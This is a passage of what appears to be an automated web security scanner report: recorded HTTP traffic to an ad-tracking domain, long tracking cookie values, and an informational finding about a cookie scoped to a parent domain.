NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_6gI0="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3Jk6SbsCfwKDgvE+mu/ihtvDaMnTyEIMqrkXctiBwLrHpU1l8pZbXY2VOe9PIcfFRS2PqRUqSEB0TCrYF8Mwl5Ft4iss5u2Pcc24QCI18w5B4BJB7BBktsY3a3dIoaeEzv1gCZYQLm+iTpuiNwHUPR7nG5tHQgDYqMq3jcmBdNUo+aPKOPUGQsXtcoje6MyRn4m9giNEAHQ8VcQjuFdyEELSPDqdr3PgzdOa/RX17w1n2/ZR7mBFE3s2CqFExiSqmxpb3c6r8M4ja5hAKD3UQcNpkKNiw+kSpSEphpn0eo7pMTeV27mR0MQvYChqA9q8UOQ6iBMmc0Xv7k0pstyXew5HQSEq4ClAkFykVua5CAQR1B03ZrUQb6Wm/ZAnaE158HGLuQmW/VjbAHOhzSUHR30YbTu5y1PY2JiQ/IEaUi6G363UlqjxbOSFGUUEDoQ8JFk6i6a7Tr3plYxqoyZKZRrEqmXEIiY20CNrZQPavHVh2V8jc543cK+HKKozGAvmmLc+OVr+XRJgKOiRXyaGblZvKIwj2F21YRhoemr5qLOLo0toum9o49geFi3yyn4J8w03HU9Bk1hOtENXoketgu/qmihKe2XFma+E02PNFPGuuxplyZnH6YvGhvbtWp5C+0xizXKs5J4VBXTveIoG/doLTu8XdwePZzPmLx3F7nFNMciJ6m0FbyR3JafmXu8cJCaJZnFD4SQJC+d2oLQVITeWcixmwptX3kgUw2U8RzwnQ7SJ/VVxLjarpXs2pqe4sDrBXuP2NO1JdpAupJEd1ssEFbMSQq+NdmjfjmKP6ULQNL38izWPMrazExTyQGD5uhpxUL8GhfjaMgAdqV1vPI9EcGnDu1K9GfE+Cj/xgSG/7WTCUIJgNp/3Lv6DnMgo/eooFAD0CBHci/5yXYR+v5ibTjgJ51brP6xpgRBYjZ/Ks4/SxKI7lRTSE/jJFYp1dujnR8AAZf7PH2XnSFEYa54EM75fwVlJHE3ak62TWWsK36/c2r19yfGPALcemMK05QNyFvaki+zUEAz/svHYF9RkxcgfwCCgJrAH9p7FV9h5/MgAcvi8BD3E0GNW/IoO279Q+Pibc8qnJFQF/J16xcyJevzCT3/JowCR8BN1o7Ag5cPnZ23/mGzpeDBpoJRIk1KIIbmYvoLfDRT/LlSOI3+yFnixWSJV5LNIEcco8FT64orHIUHMxM0+smb1ZHRpZt/zfiAnoTyAfp04qmBoKKNDOJ9yRI9GgMHBWvQjI7E2AR4omZu8imWWC0iweezb28mBXVoNCt2rj/ij460rCMBX8QX"; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/RJ/0QxWQt7qn94EC+Qxu7A2AHtZzJRHgcWu/bVeDKB3b9dz2AhPmo8/85sfCdilOoOVZUDqUQOp73thqhOFYzG0A50PtwRhdxvCEnpfYem7EybySj4aBmi3UNoLYYn+X6EMb89s1eHFYyQiR5GW6wJY7f6be4tFySJly2+3m12YMfGSNpsz0Mg2husRtrfAV1UyAuxEtufB8A2uAXVFd6+l4e2nV6NwSVv/y4rCVycmg/Mxwkgjbgng1tRky8t4FLI/CfQt4xGkrWF+5Qf9uXTmIAK9/AZ/EfrIjC8psnfNV7RuIyFzfFyhgU7vH+T8y053rsBaA8VIIkfDb0hjIK+sXDWNE2vkhEOhuSR+E22iFjjdDGxvLJeIYYGAcRBW/rJ1Vn9uPtnOZt9MmVH4IfX3fehdDTo2KVNZP7UyaG9yFSfx0+hz00KiZFkke8M3b0yWZQzbOrBWeE+ORqgyYFoXx7R0SuqDIjyXoflYnZXLusG8CNkjag9tInkCJOg5/2Vic+WEJdSTVEd2PKn7IZQf6WvHGMa1Ur1v9k4dm8THWe2PfNL9ymcsDEVMRiTOtzeTIkZ7j81GpQbwy0XgYT9aO74fdap2sLvVQf0Xq+savQLNedg3Dl8A5jJ8hLBSu8hlW6mRSPVVKbENtl6WPuwbf2e4Dkxm0x3bYPH7fpP/ztT8fLkxYyf8PS0DHbaEqfBD0+O1afXXFi/+kqPqEtd5DIgB/q/iNQUnNXTV3NM/DwtuMTeJ8SuusOEWgF1gqVx4iI9Ns4JdRXhbX2nDQH+c5UJ6PGbZtvDgcD71IxnRDqn1VFqSh9+vNtdCVAOP8/sjzQFCVvRZPZN4TK7Rhy7LI+3GVIBrxvyFmYmbnjet0eqlclMrQx5Nmc/xWIDN+avNJo7FogYl6OoVUWhJXvo90REOabBr+rxnTsiHNoCeGRf7qVGXImShqsEKQCxtJIWvxUINiCsX2fRXPdPseN4tt0sj0dAgqv4lB2tWSb4yNdnfvrCWsHAm/f4HjBMRKal4RRIXf8E5VHVDd9WiBSZoXu0cQqCm5HAOQ2EdBJVz3iugu+AL1i1umJUuYKDUb06Sfci8wrJ8PnePmiIw001nzCgK3rEuShOF1Gk5Oi0sOuTh/7zt8R4nIEQdezQznbhmpp3OWPZsqQrpw5fbO396EljRS3DOzRnXMsBcrAZGrae8EFWLT6li044dp4DBh8UiRHbdjaC2SOSUE8ARX1zuDpliJmrbz1yzOa2RiLnbLGtOPFWNbeu3hWB0Y0sRtLBCnZyXfVZSqe0Dk+5bAETU+aeEjIP+FO7AxhbuiPwIhPYHp1rXK9vVjWZEibOAFi1CrjE9T3yUHSgK8bi9FmzdmhMOrk7f49rv4m7ZwlAmwRWIGg/Co01GDKwTmpnbAYeTT2nWGfzSYm6U99jP998YOATCjQxJtSAEmZbHVdQk70Kn7NDYr2H6n+k75he4LunRvS8ejOX6eOWC+38KHB04uWs+O98sFuKTcM7gs/hbXMc7hgZaQwpLXyRks20iUrQzBgDihjecfESnh3HF6KZvRsNCdf84+IgLtB1mBj3PNy07ZAkqZyMX8aqtNVCk/ldXbdRThqVdiS+/QaaNwB7P2Pa+OUp67q96ni0TF/fRB6FxpVptgBK0pdtloGZbI60RLfAFNmvQuTX54QGjM1d9zhugoTlwtpdB7Oql9vLrz4+cuSf02h49u5LR9ITw74V6HWBAgJknyBFLAkIpPro9FW"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+xcFRtkwLja2u1+j+YxLh8CgAHduMsTqMvOUFVuAmRIsN5MV/93E1TaNz7G3/llBewybd7S4DTmMyOgDlRSdMFxxHlgSAHBYkpBNMBoAE5id25UJ4mVtNGwNVI9r9XZ0KslJ8i27Ocxw4v7CbvNhtPQjnhWFjZE2bGoLVZc0rVW//D6vang55J1GgLZg6jMXccaYAMv6+smP9f2HkrEaSdzNqMIm1GKdwD840Doc7y3R7hj5v/EQ56eVSwG/SVRdfdd37/8J9cyK4i587bLnOAJfK42UX8rURuWyiJPXLj0R0c2CekkBvq3OIaaJwTO0rSGFVbNdoyP04ont/4DHfO3AGknsFgIm2KveUb/s+Ub8POyg3ddoFg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOoqdYRjDKMaw1JOvD8NLJUiDLUJnRBnk1iCQEDVTjL0tuNsq1LBh4dQFP7CuHjAC6pOp24XOz79cZhBbBCL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eqs9X5UFZL/+D9x3mdehfYmtLeN8ZUoZMH/G00T50TrJowfw2ZfmMOhr9IYyFfEOeSlom3PXZQItWBPEkrBxpYR9q/8EElbqGj8HG7JPcfRUU6WSSJXi3pG7800xiuwYalL797YznATh2rdj2WOPuc9qzIF++Sn8+IwHWOfhkwX9mWT9BZ2kuiv+/XVddD7B9l0yEa1PQuobXZ9UyLxLVpddgb+/7ZUh0fuWhRqwfiNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:40:46 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:40:45 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.171. http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/61287048.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPKJLGVy0b/FZGDDHvWZWoQFYW/Bxx6OKyvNtqrQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRY+14yoBM4tWDmrZdvSSuqy1TjL0tuKvI8mNIoh7KrEbQwnjBb1/LfBb8nXVzAZA1i6C8Xdm0cMC9LidpZlbEH3XMd5Xgw4jfPzI/b7RAI4gMLDLzP+SdEy0AQx9DXaeNTmC2s6HbnJgfP+I0tgk7tyNj/CzYfV5FHctMqOrpkDoPgnKfInXmzo8eN7M6w6+YxBKDqMIqbxukpogdBn+UtZBuolunW41Y23J+N63iY00FAXcAE73YN/Dql57qFUu6dll9801fT3qLLPaNP+b9FIoBf32eAwseHayTwczmXBz1WltFamSD3GIRixAc8atcD/KfEOirCTjLCfULuN/9AbhoDQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:06:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/61287048.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=MLvP+AUpZjhn51LJq1jL5845H+4h/q9mFV9PWLgeObIq1v2MeP5Su//CLAsUHtmnDZXK4kSQZQCIxDLsR0aEsBkGAsAzyTZljGHlJ8F8pLRBWXWXz7uFg34VRrvprhNnTJS7l1KD/AemqQQKvgpBrRu6zRd1PlS4lphnBRJBpeskwJoJmbZKeWobkSjufE271gNxb+vGjpijOYcghljOgfhUWq8PpR1yEVDMy+oW7gwkTGdIaRb6g/Xq3Or30JpAH2dHGwxBt0ipA9YKJjFMVIZQK31V1QLJY0/26hIsE0r9Jq+U0jFDM/NxHHaSZrJo9jHW4r5oucRHKSlX8y/cc5KrAbuSKW/UMZEcYXOHxOjzyRZCXEzvqvzF3r/dsstyGLDiA6mhH9UjuQXGSKL5gdR50WkiE5eSfxrzly+vmBebaEkqdS4Gt7Yt0uwjKC295XiU5zdDo2Sny2SsB2meLIHZZNxHHFrzCdI6NLvUFHThiQN093VeOmPJHX/XooE0PamnIXSjhrlGOxxXMhuvciB4rr4mvBDDx8KEL/CMPFEXJ+bmV9F4eIlMMCRCVkuaijphBwE1gD7yspVEFRMCIOPIGS3ZVC4YtTnEi/ZObMue9LKYS4GadB2QjoSz+eeZZScmGcx/7Qvx2LEpDrvmu0NwyrPG+al+u1+tsZFublJ1hzSKEYYON9mwCFD38Z7bwuOaLIkWnSpYGQrS9N/NHLraq+XHHPyc6uP0WHaZCECaLExNZii9II4+Own16NsrTAeV5XAXHgfld9uBcLh3poTW6fhwJ845Le00pp7tTZgvZPdq7HD3/13WJvsbtwI+YQbp1w0yQgLoBl3TfBajALnFHEsGJthFUzUP5B19iiKfkm52MuRMMCMTcICusa1b+Ltr9lKuAyh6t/Xg7C224y8nKFJwmWH4kubZ49AjrCZY6cTymswqqApRHHZhDelGbIXX4JrMIS0+aE9tjtPTYIHzoJ57JY99uTsBSB+WNv2lQYvT5PkV96hWAPmooA9FCronEBizWGdEnE3V0Hzw6+ykj02XZ+wso+h55VR9UWUXd4keI3nupV7cOvOu01JSgi23NaJLepeD5nG69fr3ek38GVZMK9hhpjeIc62eadlZvLbM0T4b4WtfgQOCbPxxCMHE6lrxDOtakbhm5tc4YocgjKNDR1/6YfiH+mZe+DMA51k+4IsIhigntMstNkcDkYa1UprKOIueeJZKM8MC5vBKvtjnv/xHDs90MQTatqF9eWWm+pJDojl44GmCn2Ohj7v5mSyy4uKRY9cL1u2MNAovkoa7Mn0C4kmhJ9lhR